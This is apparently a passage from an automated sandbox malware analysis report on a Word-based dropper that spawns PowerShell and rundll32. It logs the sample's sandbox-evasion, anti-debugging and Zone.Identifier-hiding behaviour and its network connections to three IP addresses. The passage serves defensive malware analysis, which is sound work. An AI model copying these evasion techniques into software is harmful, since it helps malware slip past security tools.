PE file moved: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yffe\xmxs.xtt:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yxkq\vxcyp.vst:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Glql\mritqo.dtl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xlll\midsk.ptl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qpvq\ojxkj.pqe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ljbn\kwuw.ehe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Doth\isebmn.lpx:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2356

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E75F0 FindFirstFileW,

17_2_002E75F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000007.00000002.2094842307.000000000032D000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind

7_2_10002460

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_10007528

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10013BFB

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A76B2 mov eax, dword ptr fs:[00000030h]	7_2_002A76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B6AB2 mov eax, dword ptr fs:[00000030h]	8_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002176B2 mov eax, dword ptr fs:[00000030h]	10_2_002176B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A6AB2 mov eax, dword ptr fs:[00000030h]	11_2_006A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007276B2 mov eax, dword ptr fs:[00000030h]	12_2_007276B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6AB2 mov eax, dword ptr fs:[00000030h]	13_2_001E6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_002276B2 mov eax, dword ptr fs:[00000030h]	14_2_002276B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00686AB2 mov eax, dword ptr fs:[00000030h]	15_2_00686AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_002E76B2 mov eax, dword ptr fs:[00000030h]	17_2_002E76B2

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10004500

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10007528
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10009F26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10006F64

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 167.71.148.58 187

Encrypted powershell cmdline option found

